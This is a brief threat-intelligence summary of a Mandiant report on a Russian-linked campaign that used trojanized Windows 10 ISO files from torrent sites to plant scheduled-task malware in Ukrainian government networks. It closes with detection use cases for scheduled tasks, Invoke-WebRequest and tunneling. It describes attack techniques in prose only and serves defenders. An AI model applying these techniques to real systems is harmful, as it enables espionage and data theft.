Malicious Scheduled Tasks Reveal A Russian Campaign Against the Ukrainian Government
Category: Threat Actor Activity | Industry: Government | Level: Tactical | Source: Mandiant
Ukrainian government networks were compromised through the use of trojanized ISO files masquerading as Windows 10 installers. Mandiant researchers report the discovery after identifying "several devices within Ukrainian Government networks which contained malicious scheduled tasks that communicated to a TOR website from around July 12th, 2022." The ISO files were hosted on Ukrainian and Russian language torrent sites. Once the malicious ISO file is dropped on the victim's workstation the malware initiates system reconnaissance to discern if the host is of interest to the attacker and from there the operator can install additional malware. "The ISO was configured to disable the typical security telemetry a Windows computer would send to Microsoft and block automatic updates and license verification." Mandiant assesses the threat actor's objective in the campaign is to collect and exfiltrate data from the Ukrainian government.
Ransomware or cryptomining have not been outcomes of the campaign thus ruling out any financial motivations. Mandiant associates the activity to threat cluster UNC4166 having ties to other Russian GRU operations including those leading to wiper deployments such as APT28. "The use of trojanized ISOs is novel in espionage operations and included anti-detection capabilities indicates that the actors behind this activity are security conscious and patient, as the operation would have required a significant time and resources to develop and wait for the ISO to be installed on a network of interest." Whilst not at the scale of a SolarWinds attack, Mandiant affirms risks associated with supply-chain attacks, stating "These operations represent a clear opportunity for operators to get to hard targets and carry out major disruptive attack which may not be contained to conflict zone."
- Malicious Scheduled Task, LOLBin & Actions on Objective
Anvilogic Use Cases:
- Create/Modify Schtasks
- Invoke-WebRequest Command
- Tunneling Process Created